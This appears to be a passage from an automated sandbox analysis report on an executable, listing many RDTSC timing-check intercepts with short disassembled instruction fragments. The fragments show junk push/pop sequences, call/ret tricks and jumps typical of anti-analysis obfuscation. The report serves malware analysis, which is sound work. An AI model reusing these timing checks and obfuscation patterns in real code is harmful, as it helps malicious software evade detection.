                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DE1139 second address: DE1149 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 push edi 0x00000006 pop edi 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DE2457 second address: DE2465 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7AB0FF775Ah 0x00000009 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DE3B31 second address: DE3B3B instructions: 0x00000000 rdtsc 0x00000002 jns 00007F7AB12EBC86h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DE3B3B second address: DE3B45 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F7AB0FF775Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DE3B45 second address: DE3B55 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a jng 00007F7AB12EBC86h 0x00000010 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DE6D8C second address: DE6D92 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DE6D92 second address: DE6D98 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D9FA13 second address: D9FA25 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7AB0FF775Eh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D9FA25 second address: D9FA39 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jbe 00007F7AB12EBC86h 0x0000000e jnl 00007F7AB12EBC86h 0x00000014 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DE92AC second address: DE92B0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DE92B0 second address: DE92D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F7AB12EBC97h 0x0000000f rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DE92D1 second address: DE92D6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DEA1FD second address: DEA203 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DEA203 second address: DEA28E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7AB0FF7768h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jnc 00007F7AB0FF7763h 0x00000012 jmp 00007F7AB0FF775Dh 0x00000017 nop 0x00000018 movzx ebx, si 0x0000001b push 00000000h 0x0000001d push 00000000h 0x0000001f push edx 0x00000020 call 00007F7AB0FF7758h 0x00000025 pop edx 0x00000026 mov dword ptr [esp+04h], edx 0x0000002a add dword ptr [esp+04h], 00000017h 0x00000032 inc edx 0x00000033 push edx 0x00000034 ret 0x00000035 pop edx 0x00000036 ret 0x00000037 mov edi, dword ptr [ebp+122D2D98h] 0x0000003d push 00000000h 0x0000003f push 00000000h 0x00000041 push edi 0x00000042 call 00007F7AB0FF7758h 0x00000047 pop edi 0x00000048 mov dword ptr [esp+04h], edi 0x0000004c add dword ptr [esp+04h], 00000019h 0x00000054 inc edi 0x00000055 push edi 0x00000056 ret 0x00000057 pop edi 0x00000058 ret 0x00000059 mov edi, dword ptr [ebp+122D2C90h] 0x0000005f push eax 0x00000060 pushad 0x00000061 push edi 0x00000062 push eax 0x00000063 push edx 0x00000064 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DEA28E second address: DEA296 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DEB0CF second address: DEB0D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DEB0D3 second address: DEB0E1 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F7AB12EBC86h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DEB0E1 second address: DEB14C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 je 00007F7AB0FF775Eh 0x0000000e jg 00007F7AB0FF7758h 0x00000014 nop 0x00000015 push 00000000h 0x00000017 push edx 0x00000018 call 00007F7AB0FF7758h 0x0000001d pop edx 0x0000001e mov dword ptr [esp+04h], edx 0x00000022 add dword ptr [esp+04h], 00000015h 0x0000002a inc edx 0x0000002b push edx 0x0000002c ret 0x0000002d pop edx 0x0000002e ret 0x0000002f push eax 0x00000030 sub dword ptr [ebp+12451875h], ebx 0x00000036 pop edi 0x00000037 push 00000000h 0x00000039 and ebx, 43A61B88h 0x0000003f push 00000000h 0x00000041 mov ebx, dword ptr [ebp+122D2ED4h] 0x00000047 xchg eax, esi 0x00000048 pushad 0x00000049 pushad 0x0000004a jmp 00007F7AB0FF775Bh 0x0000004f pushad 0x00000050 popad 0x00000051 popad 0x00000052 push ebx 0x00000053 jne 00007F7AB0FF7756h 0x00000059 pop ebx 0x0000005a popad 0x0000005b push eax 0x0000005c pushad 0x0000005d pushad 0x0000005e push eax 0x0000005f push edx 0x00000060 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DE5A17 second address: DE5A2B instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F7AB12EBC86h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e je 00007F7AB12EBC86h 0x00000014 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DEA3A0 second address: DEA3A6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DEB28A second address: DEB28E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DEBF1C second address: DEBF20 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DEA3A6 second address: DEA3AA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DEBF20 second address: DEBF2A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007F7AB0FF7756h 0x0000000a rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DEB35C second address: DEB360 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DEBF2A second address: DEBF74 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7AB0FF7767h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c push edi 0x0000000d jmp 00007F7AB0FF7761h 0x00000012 pop ebx 0x00000013 push 00000000h 0x00000015 push 00000000h 0x00000017 mov edi, dword ptr [ebp+122D32A9h] 0x0000001d push eax 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007F7AB0FF775Ch 0x00000025 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DEB360 second address: DEB364 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DEC0C0 second address: DEC0CA instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F7AB0FF7756h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DEB364 second address: DEB36A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DEC0CA second address: DEC0D0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DED2B2 second address: DED2B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DEF318 second address: DEF31D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DEC16A second address: DEC17C instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F7AB12EBC86h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop esi 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push edi 0x0000000f push edx 0x00000010 pop edx 0x00000011 pop edi 0x00000012 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF3410 second address: DF3419 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF452E second address: DF4538 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007F7AB12EBC86h 0x0000000a rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF5864 second address: DF586C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 pop eax 0x00000008 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF6908 second address: DF690E instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF690E second address: DF6913 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF6913 second address: DF696D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a mov dword ptr [ebp+122D1EE7h], ebx 0x00000010 push 00000000h 0x00000012 movzx ebx, di 0x00000015 push 00000000h 0x00000017 push 00000000h 0x00000019 push ebp 0x0000001a call 00007F7AB12EBC88h 0x0000001f pop ebp 0x00000020 mov dword ptr [esp+04h], ebp 0x00000024 add dword ptr [esp+04h], 0000001Bh 0x0000002c inc ebp 0x0000002d push ebp 0x0000002e ret 0x0000002f pop ebp 0x00000030 ret 0x00000031 jmp 00007F7AB12EBC94h 0x00000036 xor edi, 0936EA91h 0x0000003c xchg eax, esi 0x0000003d push eax 0x0000003e push edx 0x0000003f push edx 0x00000040 push eax 0x00000041 push edx 0x00000042 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF696D second address: DF6972 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF6972 second address: DF6978 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF25A5 second address: DF25A9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF791A second address: DF7992 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7AB12EBC97h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jns 00007F7AB12EBC8Ch 0x0000000f popad 0x00000010 push eax 0x00000011 jbe 00007F7AB12EBC94h 0x00000017 push edx 0x00000018 jmp 00007F7AB12EBC8Ch 0x0000001d pop edx 0x0000001e nop 0x0000001f cld 0x00000020 push 00000000h 0x00000022 mov bh, B4h 0x00000024 mov ebx, dword ptr [ebp+122D1E0Dh] 0x0000002a push 00000000h 0x0000002c push 00000000h 0x0000002e push ecx 0x0000002f call 00007F7AB12EBC88h 0x00000034 pop ecx 0x00000035 mov dword ptr [esp+04h], ecx 0x00000039 add dword ptr [esp+04h], 00000016h 0x00000041 inc ecx 0x00000042 push ecx 0x00000043 ret 0x00000044 pop ecx 0x00000045 ret 0x00000046 mov edi, 3AF63EA5h 0x0000004b xchg eax, esi 0x0000004c jc 00007F7AB12EBC8Eh 0x00000052 push edx 0x00000053 push eax 0x00000054 push edx 0x00000055 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF7992 second address: DF79AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F7AB0FF7763h 0x0000000d rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF2644 second address: DF264A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF35AF second address: DF35B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF3672 second address: DF368C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7AB12EBC90h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF368C second address: DF36AE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F7AB0FF7769h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF6B5B second address: DF6B61 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF7AEB second address: DF7AEF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF7BA8 second address: DF7BAD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF8AED second address: DF8B92 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F7AB0FF7758h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d mov dword ptr [esp], eax 0x00000010 push esi 0x00000011 jmp 00007F7AB0FF775Ch 0x00000016 pop edi 0x00000017 push dword ptr fs:[00000000h] 0x0000001e push 00000000h 0x00000020 push eax 0x00000021 call 00007F7AB0FF7758h 0x00000026 pop eax 0x00000027 mov dword ptr [esp+04h], eax 0x0000002b add dword ptr [esp+04h], 00000014h 0x00000033 inc eax 0x00000034 push eax 0x00000035 ret 0x00000036 pop eax 0x00000037 ret 0x00000038 xor ebx, dword ptr [ebp+122D1E08h] 0x0000003e mov dword ptr fs:[00000000h], esp 0x00000045 mov bx, 3631h 0x00000049 mov eax, dword ptr [ebp+122D0595h] 0x0000004f mov bx, cx 0x00000052 push FFFFFFFFh 0x00000054 push 00000000h 0x00000056 push esi 0x00000057 call 00007F7AB0FF7758h 0x0000005c pop esi 0x0000005d mov dword ptr [esp+04h], esi 0x00000061 add dword ptr [esp+04h], 0000001Dh 0x00000069 inc esi 0x0000006a push esi 0x0000006b ret 0x0000006c pop esi 0x0000006d ret 0x0000006e jmp 00007F7AB0FF7768h 0x00000073 cld 0x00000074 nop 0x00000075 push eax 0x00000076 push eax 0x00000077 push edx 0x00000078 jp 00007F7AB0FF7756h 0x0000007e rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF8B92 second address: DF8B96 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF8B96 second address: DF8BBC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jng 00007F7AB0FF776Ch 0x00000010 jmp 00007F7AB0FF7766h 0x00000015 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DFD9A3 second address: DFD9AF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007F7AB12EBC86h 0x0000000a push edi 0x0000000b pop edi 0x0000000c rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D9C567 second address: D9C57E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7AB0FF7763h 0x00000009 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D9C57E second address: D9C582 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E014E7 second address: E014F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 push eax 0x00000007 pop eax 0x00000008 popad 0x00000009 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E014F0 second address: E014FA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007F7AB12EBC86h 0x0000000a rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA4A26 second address: DA4A3F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7AB0FF775Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F7AB0FF775Ah 0x0000000e rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA4A3F second address: DA4A4B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007F7AB12EBC86h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA4A4B second address: DA4A4F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA4A4F second address: DA4A5C instructions: 0x00000000 rdtsc 0x00000002 jc 00007F7AB12EBC86h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E00CE3 second address: E00CE9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E00CE9 second address: E00D03 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jmp 00007F7AB12EBC94h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E00D03 second address: E00D10 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 js 00007F7AB0FF7756h 0x00000009 pop edi 0x0000000a push esi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DE2D66 second address: DE2D6A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E08308 second address: E0830C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E0830C second address: E08324 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 js 00007F7AB12EBC86h 0x0000000d pop ebx 0x0000000e jo 00007F7AB12EBC8Eh 0x00000014 push edi 0x00000015 pop edi 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E08A5E second address: E08A72 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7AB0FF7760h 0x00000009 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E0E329 second address: E0E32F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E0E32F second address: E0E333 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E0E333 second address: E0E337 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E0E337 second address: E0E33D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E0D083 second address: E0D087 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E0D087 second address: E0D094 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F7AB0FF7756h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E0D77E second address: E0D7A1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7AB12EBC95h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jo 00007F7AB12EBC86h 0x00000011 push eax 0x00000012 pop eax 0x00000013 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E0D7A1 second address: E0D7A5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E0D7A5 second address: E0D7AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E0D932 second address: E0D936 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E0DBD5 second address: E0DBDA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E0DBDA second address: E0DBE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E0E01B second address: E0E02B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7AB12EBC8Ch 0x00000009 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E0E02B second address: E0E033 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E0E033 second address: E0E077 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7AB12EBC93h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jnl 00007F7AB12EBCA1h 0x00000011 pushad 0x00000012 jo 00007F7AB12EBC86h 0x00000018 push edi 0x00000019 pop edi 0x0000001a popad 0x0000001b rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E18D2F second address: E18D45 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F7AB0FF7758h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jns 00007F7AB0FF7756h 0x00000014 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E18D45 second address: E18D49 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E18D49 second address: E18D65 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F7AB0FF7766h 0x0000000b rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E18D65 second address: E18D6A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E18D6A second address: E18D70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E17D60 second address: E17D66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
